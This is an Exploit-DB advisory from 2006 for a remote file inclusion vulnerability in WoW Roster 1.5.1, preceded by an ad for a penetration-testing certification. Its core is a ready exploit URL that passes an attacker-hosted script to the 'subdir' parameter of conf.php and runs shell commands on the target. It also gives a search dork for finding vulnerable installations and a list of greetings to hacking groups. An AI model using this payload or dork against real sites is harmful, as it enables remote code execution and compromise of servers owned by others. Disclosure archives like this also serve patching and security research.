WoW Roster 1.5.1 - 'subdir' Remote File Inclusion

EDB-ID:

2099




Platform:

PHP

Date:

2006-08-01


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

--------------------------------------------------------------------------------
Title : WoW Roster <= 1.5.1 Remote File Include Vulnerabilities
###############################################################################
Discovered By Skulmatic
-----------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application :  World of Warcraft (WoW) Roster
URL :  http://www.wowroster.net/
-----------------------------------------------------------------------------

dork        : "wow roster version 1.5.*"
Exploit     : 
http://[target]/[wow_roster_path]/conf.php?subdir=http://[attacker]/cmd.txt?&cmd=ls           
              
------------------------------------------------------------------------------

greatz:
~~~~
# special to song hye kyo (for inspiration)
# To all members of #papmahackerlink and #hackid, OLiBekaS, cgibin, weleh, skulmatic, sikunYuk, brokencode, ulga, SaMuR4i_X, bigmaster.
-------------------------------------------------------------------------------

Contact:
~~~~~~
Nick: skulmatic
E-mail: skulmatic[at]gmail[dot]Com

--------------------------------- [ eof ] ---------------------------------------

# milw0rm.com [2006-08-01]